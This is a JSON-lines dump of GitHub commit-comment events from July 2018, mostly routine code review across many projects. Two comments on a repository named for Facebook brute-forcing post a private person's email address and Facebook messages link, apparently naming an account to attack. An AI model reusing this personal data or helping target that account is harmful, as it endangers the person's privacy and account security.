{"id":"7937283339","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640901,"position":null,"line":null,"path":null,"commit_id":"128b594643954c171da0f52160a99c672a9ca2cb","created_at":"2018-07-09T12:24:04Z","updated_at":"2018-07-09T12:24:04Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=408)"}},"created_at":"2018-07-09T12:24:04Z"}
{"id":"7937283389","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640902,"position":null,"line":null,"path":null,"commit_id":"128b594643954c171da0f52160a99c672a9ca2cb","created_at":"2018-07-09T12:24:05Z","updated_at":"2018-07-09T12:24:05Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:24:05Z"}
{"id":"7937284140","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640905,"position":null,"line":null,"path":null,"commit_id":"0a470fddcd3c79424de889c475bf5a7f5f522f6a","created_at":"2018-07-09T12:24:13Z","updated_at":"2018-07-09T12:24:13Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=409)"}},"created_at":"2018-07-09T12:24:13Z"}
{"id":"7937284232","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640906,"position":null,"line":null,"path":null,"commit_id":"0a470fddcd3c79424de889c475bf5a7f5f522f6a","created_at":"2018-07-09T12:24:14Z","updated_at":"2018-07-09T12:24:14Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:24:14Z"}
{"id":"7937284272","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"yegor256/cactoos"},"payload":{"comment":{"id":29640907,"position":null,"line":null,"path":null,"commit_id":"504649dc80f245fc656ddac3f381c7f5028a4483","created_at":"2018-07-09T12:24:14Z","updated_at":"2018-07-09T12:24:14Z","author_association":"COLLABORATOR","body":"Puzzle `878-f712c12a` disappeared from [`src/main/java/org/cactoos/text/JoinedText.java`](https://github.com/yegor256/cactoos/blob/master/src/main/java/org/cactoos/text/JoinedText.java), that's why I closed #897. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-09T12:24:14Z"}
{"id":"7937284742","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640908,"position":null,"line":null,"path":null,"commit_id":"f9e5a84627538b1008954b283e771c55cb43f5da","created_at":"2018-07-09T12:24:20Z","updated_at":"2018-07-09T12:24:20Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=410)"}},"created_at":"2018-07-09T12:24:20Z"}
{"id":"7937284816","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640909,"position":null,"line":null,"path":null,"commit_id":"f9e5a84627538b1008954b283e771c55cb43f5da","created_at":"2018-07-09T12:24:21Z","updated_at":"2018-07-09T12:24:21Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:24:21Z"}
{"id":"7937285274","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"yegor256/cactoos"},"payload":{"comment":{"id":29640910,"position":null,"line":null,"path":null,"commit_id":"504649dc80f245fc656ddac3f381c7f5028a4483","created_at":"2018-07-09T12:24:26Z","updated_at":"2018-07-09T12:24:26Z","author_association":"COLLABORATOR","body":"Puzzle `897-9c9a3952` discovered in   [`src/main/java/org/cactoos/text/Base64Text.java`](  https://github.com/yegor256/cactoos/blob/master/src/main/java/org/cactoos/text/Base64Text.java)   and submitted as #929. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-09T12:24:26Z"}
{"id":"7937285300","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640911,"position":null,"line":null,"path":null,"commit_id":"25664e087d91e8fb1df3677f05a1909d410e98bc","created_at":"2018-07-09T12:24:26Z","updated_at":"2018-07-09T12:24:26Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=411)"}},"created_at":"2018-07-09T12:24:26Z"}
{"id":"7937285354","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640913,"position":null,"line":null,"path":null,"commit_id":"25664e087d91e8fb1df3677f05a1909d410e98bc","created_at":"2018-07-09T12:24:27Z","updated_at":"2018-07-09T12:24:27Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:24:27Z"}
{"id":"7937285761","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640915,"position":null,"line":null,"path":null,"commit_id":"b24a5b259995d12fa4410d46119cdd80106aaf12","created_at":"2018-07-09T12:24:32Z","updated_at":"2018-07-09T12:24:32Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=412)"}},"created_at":"2018-07-09T12:24:32Z"}
{"id":"7937285837","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640916,"position":null,"line":null,"path":null,"commit_id":"b24a5b259995d12fa4410d46119cdd80106aaf12","created_at":"2018-07-09T12:24:33Z","updated_at":"2018-07-09T12:24:33Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:24:33Z"}
{"id":"7937286317","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640918,"position":null,"line":null,"path":null,"commit_id":"5b21b59f1f0332650a66f951811001e127057557","created_at":"2018-07-09T12:24:39Z","updated_at":"2018-07-09T12:24:39Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=413)"}},"created_at":"2018-07-09T12:24:39Z"}
{"id":"7937286393","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640919,"position":null,"line":null,"path":null,"commit_id":"5b21b59f1f0332650a66f951811001e127057557","created_at":"2018-07-09T12:24:40Z","updated_at":"2018-07-09T12:24:40Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:24:40Z"}
{"id":"7937286790","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640920,"position":null,"line":null,"path":null,"commit_id":"2509703400b1366e9d1ad88076de609623bda90d","created_at":"2018-07-09T12:24:44Z","updated_at":"2018-07-09T12:24:44Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=414)"}},"created_at":"2018-07-09T12:24:44Z"}
{"id":"7937286843","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640921,"position":null,"line":null,"path":null,"commit_id":"2509703400b1366e9d1ad88076de609623bda90d","created_at":"2018-07-09T12:24:45Z","updated_at":"2018-07-09T12:24:45Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:24:45Z"}
{"id":"7937287320","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640924,"position":null,"line":null,"path":null,"commit_id":"f7a3ddfd55be17839187599d8f3985f6bc162728","created_at":"2018-07-09T12:24:51Z","updated_at":"2018-07-09T12:24:51Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=415)"}},"created_at":"2018-07-09T12:24:51Z"}
{"id":"7937287425","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640925,"position":null,"line":null,"path":null,"commit_id":"f7a3ddfd55be17839187599d8f3985f6bc162728","created_at":"2018-07-09T12:24:52Z","updated_at":"2018-07-09T12:24:52Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:24:52Z"}
{"id":"7937313035","type":"CommitCommentEvent","actor":{"login":"ianpaschal"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29641030,"position":8,"line":536,"path":"resources/qml/Preferences/MaterialView.qml","commit_id":"77bd6cf749e479d51570bbe5892593916edd72a0","created_at":"2018-07-09T12:30:05Z","updated_at":"2018-07-09T12:30:05Z","author_association":"CONTRIBUTOR","body":"In Javascript, `undefined` and `\"\"` evaluate as `false` so you can just write:\r\n\r\n```js\r\nreturn material_weight || 0\r\n```"}},"created_at":"2018-07-09T12:30:05Z"}
{"id":"7937315996","type":"CommitCommentEvent","actor":{"login":"ianpaschal"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29641037,"position":8,"line":536,"path":"resources/qml/Preferences/MaterialView.qml","commit_id":"77bd6cf749e479d51570bbe5892593916edd72a0","created_at":"2018-07-09T12:30:40Z","updated_at":"2018-07-09T12:30:40Z","author_association":"CONTRIBUTOR","body":"Also, missing semi-colon."}},"created_at":"2018-07-09T12:30:40Z"}
{"id":"7937318128","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641042,"position":null,"line":null,"path":null,"commit_id":"715022adbc9562545e4efc9886befeb6bada90ef","created_at":"2018-07-09T12:31:05Z","updated_at":"2018-07-09T12:31:05Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=440)"}},"created_at":"2018-07-09T12:31:05Z"}
{"id":"7937318162","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641043,"position":null,"line":null,"path":null,"commit_id":"715022adbc9562545e4efc9886befeb6bada90ef","created_at":"2018-07-09T12:31:05Z","updated_at":"2018-07-09T12:31:05Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:31:05Z"}
{"id":"7937321060","type":"CommitCommentEvent","actor":{"login":"sschmidTU"},"repo":{"name":"opensheetmusicdisplay/opensheetmusicdisplay"},"payload":{"comment":{"id":29641046,"position":null,"line":null,"path":null,"commit_id":"ea521f9f0d470fd2afbdb27d20dc7c02b36a1081","created_at":"2018-07-09T12:31:38Z","updated_at":"2018-07-09T12:31:38Z","author_association":"CONTRIBUTOR","body":"commit comment should read \"refactored refactor/isGrace changes\""}},"created_at":"2018-07-09T12:31:38Z"}
{"id":"7937321761","type":"CommitCommentEvent","actor":{"login":"MarchRains"},"repo":{"name":"MarchRains/MRshangJ.github.io"},"payload":{"comment":{"id":29641050,"position":null,"line":null,"path":null,"commit_id":"f068a2541697e11079e5d6b8f20197436ecebb1f","created_at":"2018-07-09T12:31:46Z","updated_at":"2018-07-09T12:31:46Z","author_association":"OWNER","body":"Nice!"}},"created_at":"2018-07-09T12:31:46Z"}
{"id":"7937335002","type":"CommitCommentEvent","actor":{"login":"StephanPreibisch"},"repo":{"name":"PreibischLab/multiview-reconstruction"},"payload":{"comment":{"id":29641071,"position":null,"line":null,"path":null,"commit_id":"5bfa64f91dc1bcd4bd74e1bb81a0db38e44e0ee2","created_at":"2018-07-09T12:34:23Z","updated_at":"2018-07-09T12:34:23Z","author_association":"MEMBER","body":"Thanks @hoerldavid, this sounds good. I'd do a new release next week, can you send Paul the compiled JARs so he can try?"}},"created_at":"2018-07-09T12:34:23Z"}
{"id":"7937346213","type":"CommitCommentEvent","actor":{"login":"Exayy"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29641087,"position":10,"line":10,"path":"server/controllers/storeList.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-09T12:36:37Z","updated_at":"2018-07-09T12:36:37Z","author_association":"OWNER","body":"Erreur de ma part, c'était un debuging qui est resté, dans une situation réelle, une erreur http 5xx aurait été bienvenue."}},"created_at":"2018-07-09T12:36:37Z"}
{"id":"7937349937","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29641091,"position":59,"line":1737,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T12:37:19Z","updated_at":"2018-07-09T12:37:19Z","author_association":"COLLABORATOR","body":"tümen? like on bin? hmm maybe it isn't used as a number outside of history writing"}},"created_at":"2018-07-09T12:37:19Z"}
{"id":"7937351293","type":"CommitCommentEvent","actor":{"login":"goral09"},"repo":{"name":"rchain/rchain"},"payload":{"comment":{"id":29641095,"position":10,"line":106,"path":"rspace/src/main/scala/coop/rchain/rspace/ReplayRSpace.scala","commit_id":"913553245665086ba361b93f53220af7038a5fa3","created_at":"2018-07-09T12:37:35Z","updated_at":"2018-07-09T12:37:35Z","author_association":"COLLABORATOR","body":"Is it OK to throw here?  \\cc @henrytill "}},"created_at":"2018-07-09T12:37:35Z"}
{"id":"7937352532","type":"CommitCommentEvent","actor":{"login":"t-zuehlsdorff"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29641098,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-09T12:37:50Z","updated_at":"2018-07-09T12:37:50Z","author_association":"NONE","body":"@KalleZ \r\nNo, hash is disabled per default on FreeBSD. When enabling it building works fine. This makes hash no longer optional. Unsure if this is a bug or not :D"}},"created_at":"2018-07-09T12:37:50Z"}
{"id":"7937352553","type":"CommitCommentEvent","actor":{"login":"Exayy"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29641099,"position":10,"line":10,"path":"client/src/uis/Button/index.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-09T12:37:50Z","updated_at":"2018-07-09T12:37:50Z","author_association":"OWNER","body":"En effet, copier-coller, j'aime bien généralement mettre un petit script qui gènère un composant vide ca m'évite ce genre de souci "}},"created_at":"2018-07-09T12:37:50Z"}
{"id":"7937353311","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29641101,"position":95,"line":4863,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T12:37:59Z","updated_at":"2018-07-09T12:37:59Z","author_association":"COLLABORATOR","body":"It takes suffixes."}},"created_at":"2018-07-09T12:37:59Z"}
{"id":"7937360258","type":"CommitCommentEvent","actor":{"login":"Exayy"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29641108,"position":12,"line":12,"path":"client/src/reducers/selectedStores.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-09T12:39:22Z","updated_at":"2018-07-09T12:39:22Z","author_association":"OWNER","body":"Bien vu, il devait y avoir une raison avant que je clean sur la fin mais là comme ca je vois pas, enfin oui en effet"}},"created_at":"2018-07-09T12:39:22Z"}
{"id":"7937366902","type":"CommitCommentEvent","actor":{"login":"Godwin-akit"},"repo":{"name":"Godwin-akit/quofly"},"payload":{"comment":{"id":29641117,"position":null,"line":null,"path":null,"commit_id":"d2b7715580b9ba4544ba2c3cc77227e0c0797274","created_at":"2018-07-09T12:40:40Z","updated_at":"2018-07-09T12:40:40Z","author_association":"OWNER","body":"confirm"}},"created_at":"2018-07-09T12:40:40Z"}
{"id":"7937369506","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"Galactim/Sudoku"},"payload":{"comment":{"id":29641123,"position":6,"line":46,"path":"web_app/src/views/Login.vue","commit_id":"5ea858337c4a02afe1130414b49527de9136a68d","created_at":"2018-07-09T12:41:13Z","updated_at":"2018-07-09T12:41:13Z","author_association":"MEMBER","body":"It's \"derivation\" not \"encryption\" (and that's important)"}},"created_at":"2018-07-09T12:41:13Z"}
{"id":"7937369931","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"Galactim/Sudoku"},"payload":{"comment":{"id":29641124,"position":38,"line":50,"path":"web_app/src/views/Register.vue","commit_id":"5ea858337c4a02afe1130414b49527de9136a68d","created_at":"2018-07-09T12:41:18Z","updated_at":"2018-07-09T12:41:18Z","author_association":"MEMBER","body":"Ditto"}},"created_at":"2018-07-09T12:41:18Z"}
{"id":"7937373164","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29641131,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-09T12:41:56Z","updated_at":"2018-07-09T12:41:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T12:41:56Z"}
{"id":"7937374169","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29641136,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T12:42:09Z","updated_at":"2018-07-09T12:42:09Z","author_association":"OWNER","body":"@pb00068 this tests seem to do fine so far on 8 and 32 threads, let's see if there is an easy fix for the 3 threads case. I had seen your test with simple scheme, this was inspiration for the current one, question is how many tests we need to do to pick a scheme (knowing that an elo neutral test has a chance of 0.8^N to pass testing, i.e. current test with 5 SPRT tests running is already less than 30% chance). I think to make progress on the threading case, we need a simple form that is more amendable to experimentation... of course it is possible the current scheme is optimal... but who knows."}},"created_at":"2018-07-09T12:42:09Z"}
{"id":"7937380448","type":"CommitCommentEvent","actor":{"login":"Angryvam"},"repo":{"name":"MariusVogel/WebProject-GameEngine"},"payload":{"comment":{"id":29641158,"position":9,"line":9,"path":"lib/phaser-test/TestIndex.html","commit_id":"4a39b4ec487031facfa86fc8ef79ea206150d88e","created_at":"2018-07-09T12:43:18Z","updated_at":"2018-07-09T12:43:18Z","author_association":"COLLABORATOR","body":"gz so lädt das spiel nicht mehr...\r\n"}},"created_at":"2018-07-09T12:43:18Z"}
{"id":"7937385705","type":"CommitCommentEvent","actor":{"login":"KalleZ"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29641175,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-09T12:44:20Z","updated_at":"2018-07-09T12:44:20Z","author_association":"CONTRIBUTOR","body":"Aha, because the code was directly including the hashing functions but the code does not take into account that it may disabled and therefore the headers included is essentially empty.\r\n\r\nI think that this entire block should have guards for whether or not the hash extension is available or not, much like we do other places or simply make mysqlnd have a dependency on the hash extension. Personally I prefer the first option here."}},"created_at":"2018-07-09T12:44:20Z"}
{"id":"7937386609","type":"CommitCommentEvent","actor":{"login":"bojiewang"},"repo":{"name":"thegibook/revision"},"payload":{"comment":{"id":29641178,"position":null,"line":null,"path":null,"commit_id":"16779c7df4d938c05a2202cb59d589a00a303583","created_at":"2018-07-09T12:44:31Z","updated_at":"2018-07-09T12:44:31Z","author_association":"NONE","body":"P9页其中两处\"反射会\",是否应该改为反射回"}},"created_at":"2018-07-09T12:44:31Z"}
{"id":"7937393848","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29641193,"position":null,"line":null,"path":null,"commit_id":"073b0e97060d1d1bf7e97698b35743c6038d4a76","created_at":"2018-07-09T12:45:49Z","updated_at":"2018-07-09T12:45:49Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=441)"}},"created_at":"2018-07-09T12:45:49Z"}
{"id":"7937396053","type":"CommitCommentEvent","actor":{"login":"goral09"},"repo":{"name":"rchain/rchain"},"payload":{"comment":{"id":29641202,"position":10,"line":106,"path":"rspace/src/main/scala/coop/rchain/rspace/ReplayRSpace.scala","commit_id":"913553245665086ba361b93f53220af7038a5fa3","created_at":"2018-07-09T12:46:13Z","updated_at":"2018-07-09T12:46:13Z","author_association":"COLLABORATOR","body":"@KentShikama can you make this assertion before passing arguments  to `getCommOrDataCandidates` method? I think you could simplify your method a bit."}},"created_at":"2018-07-09T12:46:13Z"}
{"id":"7937400451","type":"CommitCommentEvent","actor":{"login":"skylightanimation"},"repo":{"name":"skylightanimation/skylightanimation.github.io"},"payload":{"comment":{"id":29641209,"position":null,"line":null,"path":null,"commit_id":"df74c6c1231cdd55deb5e364f6c9d97a8f3a1c2d","created_at":"2018-07-09T12:47:02Z","updated_at":"2018-07-09T12:47:02Z","author_association":"OWNER","body":"post"}},"created_at":"2018-07-09T12:47:02Z"}
{"id":"7937402364","type":"CommitCommentEvent","actor":{"login":"Exayy"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29641214,"position":30,"line":30,"path":"client/src/layouts/StoreSelector/index.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-09T12:47:24Z","updated_at":"2018-07-09T12:47:24Z","author_association":"OWNER","body":"On peut préférer la cohérence et mettre des >0 et !== 0 partout.\r\n\r\nCependant !this.props.selectedStores.length ne marche pas, enfin disons que React va affiché un \"0\", qui est le comportement du moteur de template JSX, et je suis pas fan du this.props.selectedStores.length > 0, car là JSX s'en sort très bien comme ca"}},"created_at":"2018-07-09T12:47:24Z"}
{"id":"7937403244","type":"CommitCommentEvent","actor":{"login":"jmillz88"},"repo":{"name":"themastersunil/facebook-brute-force"},"payload":{"comment":{"id":29641219,"position":null,"line":null,"path":null,"commit_id":"260162cd06bb203a9cdce458dc96ff38852bb214","created_at":"2018-07-09T12:47:33Z","updated_at":"2018-07-09T12:47:33Z","author_association":"NONE","body":"lowenberglacey@gmail.com"}},"created_at":"2018-07-09T12:47:33Z"}
{"id":"7937404891","type":"CommitCommentEvent","actor":{"login":"kuntalghosh"},"repo":{"name":"EnterpriseDB/zheap"},"payload":{"comment":{"id":29641226,"position":null,"line":null,"path":null,"commit_id":"b80e618a7df90013fb7a47c7055103a3ff462d8b","created_at":"2018-07-09T12:47:53Z","updated_at":"2018-07-09T12:47:53Z","author_association":"COLLABORATOR","body":"Hey, thanks for testing the same. But, I'm able to compile the code successfully. Could you please share the config details that you've used to compile the source?"}},"created_at":"2018-07-09T12:47:53Z"}
{"id":"7937405044","type":"CommitCommentEvent","actor":{"login":"jmillz88"},"repo":{"name":"themastersunil/facebook-brute-force"},"payload":{"comment":{"id":29641228,"position":null,"line":null,"path":null,"commit_id":"260162cd06bb203a9cdce458dc96ff38852bb214","created_at":"2018-07-09T12:47:55Z","updated_at":"2018-07-09T12:47:55Z","author_association":"NONE","body":"https://www.facebook.com/messages/t/lacey.lowenberg.90"}},"created_at":"2018-07-09T12:47:55Z"}
{"id":"7937405177","type":"CommitCommentEvent","actor":{"login":"Widmo"},"repo":{"name":"Widmo/rouncube-rcguard-recaptcha-v2"},"payload":{"comment":{"id":29641230,"position":null,"line":null,"path":null,"commit_id":"18854b337c7492dd0dbc675ef01522a174aa3d0d","created_at":"2018-07-09T12:47:57Z","updated_at":"2018-07-09T12:47:57Z","author_association":"OWNER","body":"w"}},"created_at":"2018-07-09T12:47:57Z"}
{"id":"7937405433","type":"CommitCommentEvent","actor":{"login":"shiite97"},"repo":{"name":"faerbot/shadow2"},"payload":{"comment":{"id":29641233,"position":5,"line":3,"path":"README.md","commit_id":"5232d0ec6625ed5a161b3cb0b18327cf0cb9ba8e","created_at":"2018-07-09T12:48:00Z","updated_at":"2018-07-09T12:48:00Z","author_association":"NONE","body":"@shiite97"}},"created_at":"2018-07-09T12:48:00Z"}
{"id":"7937407018","type":"CommitCommentEvent","actor":{"login":"ceball"},"repo":{"name":"pyviz/pyviz"},"payload":{"comment":{"id":29641240,"position":null,"line":null,"path":null,"commit_id":"378b2e80acfeb4f2dc04c7cdced9482ccff8b200","created_at":"2018-07-09T12:48:18Z","updated_at":"2018-07-09T12:48:18Z","author_association":"COLLABORATOR","body":"I don't understand what the certificate problem is with the github links, e.g. https://github.com/ioam/param ?"}},"created_at":"2018-07-09T12:48:18Z"}
{"id":"7937410291","type":"CommitCommentEvent","actor":{"login":"JohnsonChenFuD"},"repo":{"name":"JohnsonChenFuD/-"},"payload":{"comment":{"id":29641248,"position":null,"line":null,"path":null,"commit_id":"1cc1947ddef18fb1880bbcbb7de5b3fe66361e90","created_at":"2018-07-09T12:48:55Z","updated_at":"2018-07-09T12:48:55Z","author_association":"OWNER","body":"https://github.com/xingshaocheng/architect-awesome"}},"created_at":"2018-07-09T12:48:55Z"}
{"id":"7937416966","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29641254,"position":59,"line":1737,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T12:50:10Z","updated_at":"2018-07-09T12:50:10Z","author_association":"COLLABORATOR","body":"Rather than the domain I think that these kinds of words aren't necessarily\ndifferent from a _bucketful_ or a _handful_. Noun is probably the right\nthing to use year.\n\nOn Mon, Jul 9, 2018, 3:37 PM koguzhan <notifications@github.com> wrote:\n\n> tümen? like on bin? hmm maybe it isn't used as a number outside of history\n> writing\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/754286c3f4811724957f820462d4e5d6272159fd#commitcomment-29641091>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2jP1ldlhVZm92xX7obB9fNaAeYDpks5uE05_gaJpZM4VHjwL>\n> .\n>\n"}},"created_at":"2018-07-09T12:50:10Z"}
{"id":"7937419875","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/dtc"},"payload":{"comment":{"id":29641261,"position":25,"line":762,"path":"pylibfdt/libfdt.i","commit_id":"44b4dcecdd3153b4a0a36d9dfcab23d6ee917dc2","created_at":"2018-07-09T12:50:42Z","updated_at":"2018-07-09T12:50:42Z","author_association":"NONE","body":"This has no error checking, so any raised exception leaks to subsequent code.\r\nTry:\r\n```\r\n        if (PyBytes_Check($input)) {\r\n            $1 = PyBytes_AsString($input);\r\n        } else if (PyUnicode_Check($input)) {\r\n            $1 = PyUnicode_AsUTF8($input);\r\n        } else {\r\n            SWIG_exception_fail(SWIG_TypeError, \"bytes expected in method '\" \"$symname\"\r\n                \"', argument \" \"$argnum\"\" of type '\" \"$type\"\"'\");\r\n        }\r\n```"}},"created_at":"2018-07-09T12:50:42Z"}
{"id":"7937420959","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29641263,"position":95,"line":4863,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T12:50:54Z","updated_at":"2018-07-09T12:50:54Z","author_association":"COLLABORATOR","body":"Maybe keep both and use CG to remove N when it is nominative and singular.\n\nOn Mon, Jul 9, 2018, 3:38 PM koguzhan <notifications@github.com> wrote:\n\n> It takes suffixes.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/754286c3f4811724957f820462d4e5d6272159fd#commitcomment-29641101>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2omuUWk6f1ocxv4Fp4u8YlX61kWNks5uE06ngaJpZM4VHjwL>\n> .\n>\n"}},"created_at":"2018-07-09T12:50:54Z"}
